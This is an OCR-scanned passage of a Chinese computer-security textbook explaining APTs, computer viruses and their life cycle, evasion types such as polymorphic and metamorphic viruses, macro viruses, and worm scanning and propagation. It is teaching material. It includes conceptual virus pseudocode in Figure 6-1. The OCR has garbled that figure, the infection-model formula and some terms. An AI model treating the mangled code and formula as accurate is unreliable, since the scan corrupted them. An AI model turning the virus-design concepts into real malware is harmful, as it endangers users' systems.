息 [BINS10]。 其 他 使 用 较为 广泛 的 工具 包 包括 Blackhole, Sakura 和 Phoenix. 


6.1.3 攻击 源 


近 二 十 年 来 ， 恶 意 软 件 开发 发 生 了 一 些 变 化 ， 攻 击 者 由 个 人 的 ， 以 炫 泡 技术 为 目的 变化 为 
更 加 有 组 织 和 危害 性 更 大 的 攻击 源 。 这 些 攻击 源 中 包含 有 政治 动机 的 攻击 者 、 罪 犯 和 有 组 织 的 
犯罪 。 这 些 组 织 会 向 公司 、 国 家 、 政 府 的 代理 人 出 售 服务 ， 我 们 会 在 8.1 节 中 对 其 进行 讨论 。 
在 恶意 软件 数量 上 升 的 背后 ， 是 制作 动机 的 改变 ， 这 种 改变 实际 上 催生 了 出 售 攻击 包 的 地 下 经 
济 ， 获 取 受 害 主机 的 控制 权 和 盗窃 信息 。 


6.2 ”高 级 持续 性 威胁 


近年 来 ， 高 级 持续 性 威胁 ( Advanced Persistent Threat, APT) 被 人 们 高 度 关注 。 它 并 不 是 
一 种 新 型 的 恶意 软件 ， 而 是 一 个 具有 良好 资源 、 持 续 性 的 应 用 大 量 入 侵 技术 和 恶意 软件 的 应 用 
程序 ， 这 个 应 用 程序 具有 选择 的 目标 ， 通 常 是 一 些 政治 或 商业 目标 。APT 通常 来 自 国 家 支持 的 
组 织 ， 有 些 攻击 也 可 能 来 自 犯罪 企业 。 我 们 将 在 8.1 节 中 讨论 人 侵 者 的 类 型 。 
APT 与 其 他 类 型 的 攻击 不 同 之 处 在 于 APT 精心 地 对 目标 进行 选择 ， 具 有 持续 性 ， 通 常 是 
隐秘 的 ， 入 侵 者 在 相当 的 时 期 内 都 要 致力 于 攻击 。 许 多 值得 关注 的 攻击 ， 包 括 Aurora, RSA, 
APT1 和 Stuxnet 常常 被 当 作 范例 。 这 些 APT 具有 以 下 特征 : 
e 高 级 : 攻击 者 使 用 多 种 人 侵 技术 和 恶意 软件 ， 如 果 有 需要 还 会 开发 定制 的 恶意 软件 。 
其 中 单一 的 组 件 在 技术 上 也 许 不 先进 ， 但 是 每 个 组 件 都 是 针对 目标 精心 选择 的 。 

o 持续 性 : 攻击 者 在 很 长 时 间 内 确定 针对 攻击 目标 的 攻击 应 用 可 以 最 大 化 攻击 成 功 的 概 
率 。 攻 击 手段 的 种 类 是 逐渐 递增 的 ， 通 常 是 非常 隐秘 的 ， 直 到 目标 被 攻陷 。 

o 威胁 : 针对 选 定 目 标的 威胁 来 自 有 组 织 、 有 能 力 和 有 良好 经 济 支持 的 攻击 者 ， 他 们 试 
图 攻陷 这 些 目标 。 在 攻击 过 程 中 ， 攻 击 者 的 积极 参与 极 大 地 提升 了 自动 攻击 工具 的 威 
胁 等 级 ， 也 增加 了 成 功 攻击 的 可 能 性 。 

这 些 攻 击 的 目的 ， 包括 窃取 知识 产权 或 安全 和 基础 设施 相关 数据 ， 也 包括 基础 设施 的 损 
坏 。 使 用 的 攻击 技术 ,包括 社会 工程 学 、 钓 鱼 邮件 、 选 取 目 标 组 织 中 的 人 员 可 能 会 访问 的 网 站 
植 人 下 载 驱动 。 试 图 利用 老练 的 恶意 软件 ， 通 过 多 种 传播 机 制 和 有 效 载荷 感染 目标 。 一 旦 获取 
了 目标 组 织 的 系统 初始 权限 ， 攻 击 者 会 利用 更 多 的 攻击 工具 来 维持 和 提升 他 们 的 访问 权限 。 
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由 于 此 类 攻击 具有 特殊 目标 性 和 持续 性 ， 因 此 对 其 防御 的 难度 就 会 增加 。 这 需要 将 一 系列 
的 对 抗 技术 联合 起 来 (本 章 后 半 部 分 会 进行 讨论 ) ; 同时 也 需要 通过 培训 提高 相关 员工 对 抗 此 
类 攻击 的 防范 意识 (本 书 17 章 也 会 有 相关 介绍 )。 即 使 对 当前 最 佳 实践 的 对 策 来 说 ，0-day 漏 
洞 利用 和 新 型 的 攻击 手段 仍 可 能 会 使 得 攻击 成 功 [SYMA13，MAND13]。 因 此 能 够 检测 、 响 应 
和 缓解 此 类 攻击 的 多 层 防 护 措施 是 必要 的 。 防 护 措施 需要 监听 恶意 软件 的 命令 和 控制 流 ， 检 测 
渗透 流量 。 


6.3 传播 - BRAS - 病毒 


第 一 类 恶意 软件 的 传播 涉及 软件 片段 的 寄生 ， 它 们 将 自身 依附 于 一 些 现 有 的 可 执行 内 容 
中 。 这 些 软件 片段 可 以 是 感染 应 用 程序 、 实 用 程序 或 者 系统 程序 的 机 器 代码 ， 甚 至 是 用 于 引导 
启动 计算 机 系统 的 代码 。 最 近 ， 软 件 片 段 出 现 了 脚本 语言 代码 ， 脚 本 语言 通常 用 于 支持 数据 文 
件 中 的 活动 内 容 ， 如 微软 Word 文档 、Excel 电子 表格 和 Adobe PDF 文档 。 


6.3.1 病毒 的 性 质 


计算 机 病毒 是 一 种 通过 修改 正常 程序 而 进行 感染 的 软件 。 这 种 修改 包括 向 正常 程序 注入 病 
毒 代码 来 使 病毒 程序 得 到 复制 ， 这 样 就 能 继续 感染 其 他 正常 程序 。 计 算 机 病毒 最 早出 现在 20 
世纪 80 年 代 早期 ， 而 术语 本 身 是 由 Fred Cohen 于 1983 提出 的 ， 他 所 著 的 一 本 书 在 这 个 领域 
起 到 了 奠基 作用 [COHE94]。Brain 病毒 首次 发 现 于 1986 年 ， 是 第 一 个 以 MSDOS 系统 为 目标 
的 病毒 ， 在 当时 感染 了 海量 的 计算 机 。 

生物 学 意义 上 的 病毒 是 一 种 微小 的 基因 代码 片 (DNA 或 RNA)， 它 能 控制 活 细胞 的 机 能 ， 
使 之 生成 成 千 上 万 的 病毒 拷贝 。 计 算 机 病毒 与 生物 病毒 相似 ， 它 能 通过 它 自身 携带 的 病毒 代码 
进行 完全 的 自我 复制 。 典 型 的 病毒 会 将 恶意 代码 插入 到 正常 程序 中 。 这 样 ， 一 旦 被 感染 的 计算 
机 与 未 被 感染 的 软件 交互 ， 病 毒 的 一 个 拷贝 就 会 感染 新 的 程序 。 因 此 ， 病 毒 就 通过 互相 信任 的 
用 户 之 间 的 磁盘 、U 盘 或 网 络 交换 数据 而 在 计算 机 之 间 传 播 开 来 。 在 网 络 环境 下 ,访问 其 他 计 
算 机 上 的 文档 、 应 用 程序 和 系统 服务 的 能 力 为 病毒 的 传播 提供 了 温床 。 

病毒 可 以 实现 正常 程序 所 能 实现 的 任何 功能 ， 所 不 同 的 是 病毒 把 自己 附着 在 宿主 程序 上 ， 
而 且 跟 着 宿主 程序 的 运行 而 悄悄 地 运行 。 一 旦 病毒 执行 ， 它 能 够 实现 任何 功能 ， 例 如 删除 文件 
和 程序 ， 这 些 行为 都 是 当前 用 户 权限 所 允许 的 。 在 早 些 年 间 ， 病 毒 统治 恶意 软件 领域 的 一 个 原 
因 是 缺少 对 用 户 身份 的 认证 和 对 私人 计算 机 系统 的 访问 控制 。 如 此 ， 病 毒 可 以 感染 系统 中 任何 
一 个 可 执行 程序 。 大 量 的 程序 共享 在 软磁盘 上 也 会 令 病毒 较 容易 地 传播 ， 尽 管 速度 可 能 较 慢 。 
含有 严格 访问 控制 的 现代 操作 系统 显著 地 阻碍 了 传统 的 、 机 器 可 执行 代码 形式 的 病毒 的 感染 。 
这 导致 了 宏 病毒 这 一 利用 某 些 文档 格式 ， 如 MS Word 文档 、Excel 电子 表格 和 Adobe PDF X 
件 等 ， 所 支持 的 活动 内 容 的 新 型 病毒 的 出 现 。 上 述 文档 即使 在 用 户 的 正常 系统 使 用 中 也 很 容易 
被 修改 和 分 享 ， 且 文档 无 法 用 对 程序 所 采用 的 那 种 访问 控制 进行 保护 。 当 前 ， 病 毒 感染 的 方式 
通常 是 几 种 现代 恶意 软件 传染 方式 中 的 一 种 ， 其 他 的 方式 则 包括 了 蠕虫 和 木马 等 。 

[AYCO06] 阐述 了 病毒 的 三 个 组 成 部 分 。 更 普遍 地 讲 ， 很 多 现代 的 恶意 软件 也 包含 了 以 下 
一 种 或 多 种 组 成 元 素 。 

e 感染 机 制 (infection mechanism): 是 指 病毒 传播 和 进行 自我 复制 的 方法 。 感 染 机 制 也 被 

称 为 感染 向 量 (infection vector). 
© MARE (trigger): 是 指 激 活 或 交付 病毒 有 效 载 荷 的 事件 或 条 件 ， 有 时 被 称 为 逻辑 炸 
弹 (logic bomb)。 
© ARR (payload): 是 指 病 毒 除 传播 之 外 的 活动 。 有 效 载荷 可 能 包括 破坏 活动 ， 也 可 
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能 包括 无 破坏 但 值得 注意 的 良性 活动 。 

在 其 生命 周期 中 ， 典 型 的 病毒 一 般 会 经 历 下 面 4 个 阶段 . 

e 潜伏 阶段 ( dormant phase): 病毒 处 于 休眠 状态 。 最 后 病毒 会 被 某 些 事件 激活 ， 例 如 日 
期 、 某 个 程序 或 文件 的 出 现 或 者 磁盘 的 容量 超过 某 个 限制 等 。 并 不 是 所 有 的 病毒 都 有 
这 个 阶段 。 

© 传播 阶段 (propagation phase): 病毒 将 自身 的 拷贝 插 人 其 他 程序 或 硬盘 上 某 个 与 系统 
相关 的 区 域 。 这 个 拷贝 也 许 会 和 原始 版 本 不 完全 一 样 ; 病毒 经 常 通过 变异 来 逃避 检测 。 
每 个 被 感染 的 程序 都 包含 病毒 的 一 个 拷贝 ， 而 且 这 些 拷贝 也 会 自己 进入 传播 阶段 。 

© 触发 阶段 (triggering phase) : 病毒 被 激活 以 执行 其 预先 设 定 的 功能 。 和 潜伏 阶段 一 样 ， 
病毒 进入 触发 阶段 可 以 由 多 种 系统 事件 引起 ， 例 如 包括 病毒 自身 复制 的 次 数 。 

© 执行 阶段 (execution phase): 执行 病毒 功能 。 有 的 功能 是 无 害 的 ， 例 如 在 屏幕 上 显示 一 
个 信息 ， 有 些 则 是 破坏 性 的 ， 例 如 破坏 程序 和 数据 文件 。 

多 数 病毒 是 基于 某 一 特定 的 操作 系统 以 某 种 特定 的 方式 执行 的 ， 在 某 些 情况 下 ， 还 可 能 针 

对 某 个 特定 的 硬件 平台 。 因 此 ， 它 们 在 设计 时 都 会 利用 这 些 特 定 系统 的 细节 和 漏洞 。 但 是 宏 病 
毒 是 针对 文档 类 的 文件 的 ， 常 支持 在 多 种 系统 中 运行 。 
病毒 结构 ”病毒 代码 可 以 放置 在 可 执行 程序 的 前 端 或 后 端 ， 也 可 以 某 种 其 他 方式 能 人 到 程 
序 中 。 关 键 是 要 保证 被 感染 程序 执行 时 ， 先 执行 病毒 代码 ， 然 后 执行 被 感染 程序 的 正常 代码 。 
图 6-1a 是 对 病毒 结构 的 一 个 非常 通用 的 描述 。 在 此 例 中 ， 病 毒 代 码 V 位 于 被 感染 文件 的 
前 端 ， 而 且 假 定 当 程 序 被 调用 时 ， 被 感染 程序 的 和 人口 点 为 程序 的 第 一 行 。 


program V 
1234567; 


procedure attach-to-program; 
begin 


tite := get-random-p’ get-random-program; 
until first-pri oaran- Hay 本 until Nira t-program “line = 1234567; 
prepend V to file compresa file 1») 
end; prepend CV to “tile wie ea) 
procedure execute-payload: 
begin begin i — or 
(* perform payload actions *) ttaci pales 
end; penis ge of this Pg into tempfile, 
execute ee (¢ z 
procedure trigger-condition; and) 
begin 
(* return true if trigger condition is true *) 


aa © oa pic ae *) 
tach-r 
is tr: ieee Batt las then execute-payload; 


goto original program code; 
end; 





a) 一 个 简单 的 病毒 b) 一 个 压缩 型 病毒 
图 6-1 病毒 逻辑 实例 


被 感染 的 程序 以 病毒 代码 开始 ， 其 执行 过 程 如 下 : 程序 第 一 行 指令 跳 转 到 病毒 的 主 程序 
中 。 第 二 行 是 一 个 特殊 的 标记 ， 病 毒 利用 该 标记 来 判断 潜在 的 受害 程序 是 否 已 经 被 感染 。 当 被 
感染 程序 执行 时 ， 控 制 权 马上 就 交 给 病毒 主 程序 。 病 毒 程 序 首先 搜索 正常 的 可 执行 程序 ， 并 感 
染 它们 。 然 后 ， 病 毒 会 执行 一 些 操作 ， 这 些 操作 大 多 都 是 对 系统 有 害 的 。 这 些 操作 可 能 在 每 次 
调用 程序 的 时 候 都 会 执行 ， 也 可 能 像 逻 辑 炸 弹 那样 ， 只 有 在 一 定 的 条 件 下 才 会 被 触发 。 最 后 ， 
病毒 把 控制 权 交 还 给 宿主 程序 。 如 果 感 染 过 程 足 够 快 ， 用 户 很 难 察觉 到 程序 被 感染 前 与 被 感染 
后 在 运行 时 间 上 的 差异 。 

上 述 类 型 的 病毒 很 容易 被 检测 到 ， 因 为 被 感染 的 可 执行 文件 的 长 度 比 以 前 增加 了 。 一 种 躲 
避 这 种 病毒 检测 方法 的 手段 是 将 可 执行 文件 压缩 ， 从 而 使 感染 前 后 文件 长 度 不 变 。 图 6-lb 描 
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述 了 一 般 情况 下 这 种 方法 所 要 求 的 逻辑 。 其 中 的 关键 行 标注 了 数字 ， 具 体 过 程 在 图 6-2 中 说 
明 。 我 们 假设 程序 Pi 被 病毒 CV 感染 。 当 这 个 程序 : 
被 调用 时 ， 控 制 权 转 到 病毒 手中 ， 并 按照 如 下 步骤 
执行 : 

th: 对 于 每 个 发 现 没 有 被 感染 的 文件 P:， 病 毒 首 


先 把 这 个 文件 压缩 成 比 原始 文件 小 的 程序 P:， 而 且 使 
P 与 P 的 长 度 刚好 差 一 个 病毒 的 大 小 。 









to: 将 病毒 的 一 个 拷贝 加 到 程序 P 的 前 端 。 tPA, URI 人 Pi 被 压缩 成 
ta: 将 被 感染 的 原始 程序 的 压缩 版 P 解压 缩 。 
ta: 执行 解压 缩 后 的 原始 程序 Pi。 


在 这 个 例子 中 ， 病 毒 除了 传播 外 ， 没 有 执行 任何 
其 他 功能 。 如 前 面 所 述 ， 这 种 病毒 也 有 可 能 含有 一 种 
或 多 种 有 效 载荷 。 

一 旦 病毒 通过 感染 某 个 程序 而 进入 系统 ， 则 当 
这 个 被 感染 的 文件 开始 执行 时 ， 它 就 可 能 感染 系统 中 





1: CV 将 自身 t: P' 被 解压 成 


的 部 分 或 者 全 部 可 执行 文件 。 因 此 ， 通 过 抢先 阻止 病 。 “附加 到 Pe 原始 程序 P， 
毒 获得 在 系统 中 执行 的 权限 就 可 以 完全 阻 断 病毒 的 感 图 6.2 压缩 型 病毒 


染 。 但 遗憾 的 是 ， 这 种 阻止 是 非常 困难 的 ， 因 为 病毒 
可 以 是 系统 之 外 的 任何 程序 的 一 部 分 。 所 以 ， 除 非 你 愿意 使 用 裸 机 ， 亲 自 编写 系统 和 应 用 程 
序 ， 否则 你 的 系统 就 存在 漏洞 。 禁 止 普通 用 户 对 程序 的 修改 可 以 使 许多 感染 方式 不 起 作用 。 


6.3.2 ”病毒 的 分 类 


自 病毒 问世 以 来 ， 病 毒 制造 者 和 反 病 毒 软件 开发 者 之 间 的 较量 就 从 未 停止 过 。 当 新 的 有 效 
的 反 病 毒 技 术 出 现 后 ， 新 的 病毒 技术 也 会 随 之 出 现 。 现 在 没有 一 种 简单 或 者 被 广泛 认可 的 病毒 
分 类 方法 。 本 节 ， 我 们 依照 文献 [AYCO06] 沿 着 两 个 相互 垂直 的 方向 来 对 病毒 进行 分 类 : 一 是 
病毒 试图 感染 对 象 的 类 型 ， 二 是 病毒 躲避 用 户 和 反 病 毒 软 件 检测 的 方法 。 
以 下 按 病 毒 的 感染 对 象 进行 分 类 : 
© 感染 引导 扇 区 病毒 (boot sector infector) : 感染 主 引导 记录 或 引导 记录 ， 当 系统 从 含有 
这 类 病毒 的 磁盘 上 启动 时 病毒 就 开始 了 传播 。 
© 感染 可 执行 文件 病毒 (file infector): 感染 可 以 在 操作 系统 或 shell 中 执行 的 文件 。 
© EH (macro virus): 感染 含有 由 应 用 程序 解释 的 可 执行 宏 代 码 或 脚本 语言 的 文件 。 
e 多 元 复合 型 病毒 (multipartite virus) : 多 种 途径 感染 文件 。 通 常情 况 下 ， 多 元 复合 型 病 
毒 可 以 感染 多 种 类 型 的 文件 ， 因 此 需要 处 理 所 有 可 能 感染 的 部 位 才能 根除 该 种 病毒 。 
以 下 按 病毒 的 隐藏 方式 进行 分 类 : 
e 加 密 型 病毒 (encrypted virus) : 典型 的 加 密 方法 是 ， 先 通过 部 分 病毒 代码 生成 一 个 随机 
的 密 钥 ， 然 后 用 密 钥 加 密 其 余部 分 。 密 钥 保 存在 病毒 代码 中 。 当 被 感染 的 程序 执行 时 ， 
先 要 使 用 这 个 随机 密 钥 解 密 被 加 密 部 分 。 在 感染 过 程 中 病毒 会 重新 生成 随机 密 钥 。 因 
为 对 每 一 个 病毒 实例 都 使 用 不 同 的 密 钥 进行 加 密 ， 所 以 在 病毒 代码 中 很 难 找到 用 于 模 
式 匹 配 的 固定 字 节 。 | 
e 隐蔽 型 病毒 ( stealth virus): 这 种 病毒 的 设计 目的 就 是 为 了 躲避 反 病 毒 软件 的 检测 ， 
此 它 不 仅仅 隐藏 部 分 病毒 代码 ， 而 是 将 病毒 整体 进行 隐藏 。 通 过 代码 的 多 态 、 压 缩 或 
者 rootkit 技术 实现 隐藏 。 


207 


146 B-A HHEMKFARKSARE 


e 多 态 病毒 ( polymorphic virus): 一 种 在 自我 复制 时 ， 为 了 防止 被 其 他 程序 检测 到 ， 生 
成 功能 相同 但 位 排列 方式 完全 不 同 的 拷贝 的 病毒 。 在 这 种 情况 下 ， 每 种 病毒 拷贝 的 
“特征 码 ” 都 不 尽 相同 。 为 了 达到 这 个 目的 ， 多 态 病 毒 可 能 随机 插入 元 余 指令 或 者 交换 
独立 指令 的 顺序 。 更 有 效 的 方法 是 使 用 加 密 。 加 密 病毒 的 策略 如 下 : 病毒 代码 中 负责 
生成 密 钥 和 执行 加 密 / 解密 的 部 分 称 为 变形 引擎 (mutation engine)。 这 个 变形 引擎 本 身 
在 每 一 次 执行 过 程 中 也 会 发 生 改 变 。 

© 变形 病毒 (metamorphic virus): 与 多 态 病毒 一 样 ， 每 次 感染 病毒 都 发 生变 异 。 不 同 的 是 
变形 病毒 在 每 次 变异 中 都 重 写 病毒 体 ， 因 此 增加 病毒 检测 的 难度 。 变 形 病毒 每 次 变异 
并 不 仅仅 改变 病毒 代码 的 组 织 形式 ， 而 是 病毒 行为 也 改变 了 。 


6.3.3 ” 宏 病 毒 和 脚本 病毒 


20 世纪 90 年 代 中 期 ， 宏 病毒 成 为 最 流行 的 病毒 。 其 可 以 感染 被 多 种 文档 类 型 当 作 活动 内 
容 的 脚本 代码 。 由 于 以 下 原因 ， 宏 病毒 具有 严重 的 安全 威胁 : 

1. 宏 病毒 是 与 系统 平台 无 关 的 。 宏 病毒 大 多 会 感染 微软 Word 文档 或 其 他 微软 Office 文档 
或 PDF 文档 中 的 脚本 代码 。 任 何 支持 这 类 应 用 软件 的 硬件 平台 和 操作 系统 都 可 能 被 感染 。 

2. 宏 病 毒 只 感染 文档 ， 而 不 感染 可 执行 文件 。 计 算 机 系统 中 的 绝 大 部 分 信息 是 以 文档 的 形 
式 保 存 的 ， 而 不 是 程序 文件 。 

3. 宏 病 毒 传播 简单 ， 只 要 被 感染 文档 在 正常 使 用 中 被 共享 即 可 。 电 子 邮 件 就 是 宏 病毒 一 种 
最 常见 的 传播 方式 。 

4. 由 于 宏 病 毒 感染 的 是 用 户 的 文档 ， 而 不 是 系统 程序 ， 因 此 传统 的 文件 系统 访问 控制 机 制 
对 宏 病 毒 传播 的 控制 能 力 有 限 。 

宏 病 毒 利用 了 Word 和 其 他 一 些 办 公 软 件 如 Microsoft Excel 支持 宏 指令 或 脚本 语言 的 特 
点 。 实 质 上 ， 宏 就 是 嵌入 到 字 处 理 文档 或 其 他 类 型 文件 中 的 可 执行 程序 。 通 常 ， 用 户 使 用 宏 来 
自动 完成 一 些 重复 性 的 工作 ， 以 减少 键盘 输入 。 它 们 被 用 于 支持 动态 内 容 和 其 他 与 这 些 文件 有 
关联 的 有 效 任务 。 

在 微软 Office 软件 的 后 续 版 本 中 增强 了 对 宏 病 毒 的 防护 。 例 如 ， 微 软 提供 了 一 款 可 选 的 宏 
病毒 防护 工具 。 这 款 工具 能 检测 可 疑 的 Word 文档 ， 并 提醒 用 户 打开 含有 宏 的 文件 的 潜在 危险 
性 。 许 多 反 病 毒 公司 也 提供 了 检测 和 清除 宏 病毒 的 工具 。 和 其 他 类 型 的 病毒 一 样 ， 宏 病毒 和 杀 
毒 软件 之 间 的 较量 仍 在 继续 ， 但 宏 病毒 已 经 不 再 是 主要 的 病毒 威胁 了 。 

宏 病 毒 男 一 种 可 能 的 宿主 是 Adobe PDF 格式 文档 。PDF 文档 可 以 支持 许多 嵌入 组 件 ， 包 
括 Javascript 或 其 他 类 型 的 脚本 代码 。 虽 然 当 前 的 PDF 阅读 器 增加 了 警告 用 户 运 行 此 类 代码 的 
功能 ， 但 是 警告 信息 可 以 被 修改 ， 从 而 欺骗 读者 允许 脚本 代码 的 运行 。 如 果 此 类 情况 发 生 ， 脚 
本 代码 可 能 会 有 成 为 病毒 的 潜在 可 能 ， 感 染 系统 中 其 他 的 PDF 文档 。 或 者 它 可 以 安装 一 个 木 
马 或 作为 一 个 蠕虫 ， 我 们 会 在 稍 后 对 其 讨论 [STEV11]。 


6.4 传播 - 漏洞 利用 -蠕虫 


恶意 软件 的 另 一 种 传播 类 型 涉及 软件 漏洞 利用 (这 些 漏洞 我 们 将 会 在 第 10 章 和 第 11 章 中 
讨论 )， 而 计算 机 蠕虫 通常 会 利用 这 些 漏 洞 。 蠕 虫 是 一 种 主动 寻找 并 感染 其 他 机 器 的 程序 ， 而 
每 台 被 感染 机 器 又 转 而 成 为 自动 攻击 其 他 机 器 的 跳板 。 蠕 虫 利 用 存在 于 客户 端 或 服务 器 程序 中 
的 漏洞 来 获取 每 个 新 系统 的 权限 ， 利 用 网 络 连接 在 系统 间 传 播 ， 也 能 通过 共享 媒介 (如 USB 
设备 或 者 CD、DVD 数据 光盘 ) 进行 传播 。 电 子 邮 件 蠕虫 通过 附带 的 文档 或 即时 消息 通信 中 的 
宏 或 脚本 代码 传播 。 一 旦 被 激活 ， 蠕 虫 就 可 以 再 次 复制 并 传播 。 除 了 传播 之 外 ， 蠕 虫 通常 还 会 
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附带 其 他 的 一 些 有 效 载 兴 ， 这 些 我 们 将 在 后 面 讨 论 。 
计算 机 蠕虫 的 概念 来 自 John Brunner 在 1975 年 写 的 科幻 小 说 《 The Shockwave Rider 》。 
第 一 个 著名 的 蠕虫 程序 是 20 世纪 80 年 代 早期 在 Xerox Palo Alto 实验 室 中 实现 的 。 这 个 蠕虫 程 
序 是 无 恶意 的 ， 它 被 用 来 寻找 空闲 的 系统 去 运行 计算 密集 型 的 任务 。 
为 了 复制 自身 ， 蠕 虫 利 用 一 些 方法 来 访问 远程 系统 。 这 些 方法 (其 中 大 部 分 可 以 在 文献 
[SYMA13] 中 找到 ) 如 下 : 
e 电子 邮件 或 即时 通信 工具 : 蠕虫 通过 邮件 将 自己 的 拷贝 发 送 到 其 他 系统 中 去 ,或 者 将 
自身 当 作 即 时 通信 服务 的 附件 进行 发 送 。 当 打开 或 浏览 电子 邮件 或 附件 时 ， 蠕 虫 的 代 
码 就 会 被 执行 了 。 
e 文件 共享 : 蠕虫 可 以 在 如 USB 设备 等 可 插 拔 媒介 上 创建 自己 的 拷贝 ， 或 像 病 毒 那样 感 
染 此 类 媒介 上 适合 的 文件 。 当 设备 通过 自动 运行 机 制 连接 至 其 他 系统 时 ， 蠕 虫 可 以 借 
助 软件 中 的 漏洞 执行 ; 或 者 ， 当 用 户 在 目标 系统 上 打开 被 感染 文件 时 ， 蠕 虫 也 将 借 机 
执行 。 
© 远程 执行 能 力 : 蠕虫 有 在 其 他 系统 中 执行 自己 的 拷贝 的 能 力 。 一 般 通过 直接 的 远程 执 
行 工具 ,或 者 通过 在 网 络 服务 上 产生 一 个 溢出 从 而 暗中 执行 操作 ( 像 我 们 在 第 10 章 和 
11 章 讨论 的 那样 )。 
e 远程 文件 访问 或 传输 能 力 : 蠕虫 利用 远程 文件 访问 或 者 传输 服务 向 其 他 系统 复制 自身 
拷贝 ， 该 系统 的 用 户 此 后 便 有 可 能 执行 它 。 
e 远程 登录 能 力 : 蠕虫 以 一 个 用 户 的 身份 登录 到 远程 系统 ， 然 后 使 用 命令 将 自己 拷贝 到 
将 要 被 执行 的 另 一 个 系统 中 。 
蠕虫 程序 的 新 拷贝 然后 在 远程 系统 中 运行 ， 除 了 它 在 该 系统 中 完成 的 任何 功能 之 外 ， 它 还 
会 以 相同 的 方式 继续 传播 。 
蠕虫 显示 出 与 计算 机 病毒 相同 的 特征 ， 它 具有 下 面 几 个 阶段 : 潜伏 阶段 、 传 播 阶段 、 触 发 
阶段 和 执行 阶段 。 在 传播 阶段 中 主要 执行 如 下 功能 : 
e 通过 检查 主机 列表 、 地 址 库 、 好 友 名 单 、 可 信 结 点 或 其 他 可 以 获取 远程 系统 权限 的 
细节 ， 扫 描 可 能 的 目标 主机 地 址 ， 或 搜寻 合适 的 可 移动 设备 ， 来 寻找 合适 的 访问 控制 
机 制 。 
e 通过 访问 控制 机 制 将 自己 复制 到 远程 主机 上 ， 并 使 该 拷贝 运行 。 
蠕虫 在 复制 自己 到 远程 主机 前 ， 可 能 会 先 检 查 该 系统 是 否 已 经 被 感染 。 在 多 进程 系统 中 ， 
蠕虫 通过 把 自己 命名 为 系统 进程 或 者 其 他 不 被 系统 操作 员 注 意 的 名 字 来 伪装 自己 。 更 新 型 的 蠕 
虫 甚至 能 将 自身 的 代码 注 和 人 系统 中 已 经 存在 的 进程 里 ， 并 以 该 进程 中 的 一 个 额外 的 线程 的 形式 
运行 ， 以 此 进一步 隐藏 自身 。 


6.4.1 发 现 目 标 


网 络 蠕虫 在 传播 阶段 的 首要 功能 是 寻找 其 他 系统 进行 感染 ， 这 个 过 程 可 以 叫 作 扫描 
(scanning) 或 指纹 采集 ( fingerprinting)。 对 使 用 远程 访问 的 网 络 服务 来 攻击 软件 漏洞 的 蠕虫 而 
言 ， 它 必须 先 明确 找 出 潜在 的 运行 有 易 感染 服务 的 系统 ， 然 后 再 进行 感染 。 此 后 ， 通 常 来 说 ， 
已 经 安装 在 被 感染 机 器 上 的 蠕虫 将 重复 相同 的 扫描 过 程 ， 直 到 被 感染 机 器 形成 一 个 大 型 的 分 布 
式 网 络 。 

文献 [MIRK04] 列 出 了 蠕虫 使 用 的 网 络 地 址 扫描 方式 : 

© 随机 式 探索 : 每 一 台 被 感染 的 主机 使 用 不 同 的 种 子 探测 IP 地 址 空间 的 随机 地 址 。 该 技 

术 会 产生 大 量 的 网 络 流量 ， 可 能 导致 在 实际 攻击 开展 前 ， 操 作 便 会 被 中 断 。 
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。 黑 名 单 : 攻击 者 首先 为 潜在 的 易 感 染 机 器 列 出 一 个 大 名 单 。 这 是 一 个 需要 花费 大 量 时 
间 ， 非 常 慢 的 过 程 ， 可 以 避免 被 检测 到 攻击 正在 进行 。 一 旦 名 单 编辑 完成 ， 攻 击 者 即 
开始 感染 名 单 中 的 机 器 。 每 个 被 感染 的 机 器 会 被 分 配 名 单 中 的 一 部 分 进行 扫描 。 这 种 
策略 会 使 得 扫描 时 间 非 常 短 ， 因 此 检测 感染 的 发 生 是 非常 困难 的 。 

© 拓扑 式 探索 : 该 方法 利用 被 感染 机 器 中 所 包含 的 信息 来 寻找 和 扫描 更 多 的 主机 。 

e 本 地 子 网 :如果 防火 墙 后 的 一 台 主 机 可 以 被 感染 ， 则 该 主机 会 在 其 所 在 的 本 地 网 络 中 
寻找 目标 。 利 用 子 网 地 址 结构 ， 被 感染 的 主机 可 以 寻找 到 其 他 本 应 受到 防火 墙 保护 的 
主机 。 


6.4.2 ”蠕虫 传播 模型 


一 个 设计 巧妙 的 蠕虫 可 以 非常 快 地 传染 大 量 的 主机 。 有 必要 建立 一 个 通用 的 蠕虫 传播 率 的 
模型 。 计 算 机 病毒 和 蠕虫 表现 出 与 生物 学 病毒 相仿 的 自我 复制 和 传播 行为 。 因 此 ， 我 们 可 以 依 
靠 经 典 的 传染 模型 来 理解 计算 机 病毒 和 蠕虫 的 传播 行为 。 简 要 来 说 ， 经 典 的 传染 模型 可 以 用 下 

面 的 公式 表示 
SO puns 
其 中 : f= 在 时 间 上 内 被 感染 的 个 体 数量 

SO 三 在 时 间 上 内 易 感 染 个 体 数 量 ( 易 感 染 但 是 并 未 被 感染 ) 

B= 感染 率 

N= ùk, N=) +À 

图 6-3 显示 了 一 组 典型 参数 集 的 动态 变化 情况 。 蠕 虫 的 传播 经 过 了 3 个 阶段 。 在 初始 阶 
段 ， 被 感染 主机 的 数量 按 指数 方式 增长 。 这 种 增长 方式 的 原因 我 们 可 以 用 一 个 简化 的 情况 来 解 
释 ， 当 一 个 蠕虫 激活 后 ， 它 感染 了 附近 的 两 台 主 机 ， 每 台 被 感染 的 主机 又 分 别 感染 了 另外 两 台 
主机 ， 然 后 以 这 种 方式 继续 感染 ， 结 果 就 呈现 出 指数 增长 。 一 段 时 间 之 后 ， 被 感染 的 主机 在 攻 
击 已 经 被 感染 的 主机 上 浪费 了 一 些 时 间 ， 从 而 使 感染 率 降低 了 。 在 这 个 中 间 阶 段 ， 感 染 的 主机 
数 近似 于 线性 增长 ， 但 是 这 个 阶段 的 感染 率 是 最 快 的 。 当 大 部 分 脆弱 的 主机 被 感染 后 ， aes 
进入 了 缓慢 结束 期 ， 在 这 一 阶段 蠕虫 要 寻找 那些 很 难 被 识别 出 来 的 剩余 主机 。 


缓慢 的 开始 阶段 ”快速 的 传播 阶段 ”缓慢 的 结束 阶段 
一 





图 6-3 蠕虫 传播 模型 
显然 ， 反 蠕虫 的 目标 应 该 是 在 慢 启动 阶段 捕获 蠕虫 ， 因 为 那 时 只 有 少量 的 主机 被 感染 。 
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基于 对 当时 蠕虫 攻击 的 分 析 ， 文 献 [ZOU05] 描述 了 一 个 蠕虫 传播 模型 。 蠕 虫 的 传播 速度 
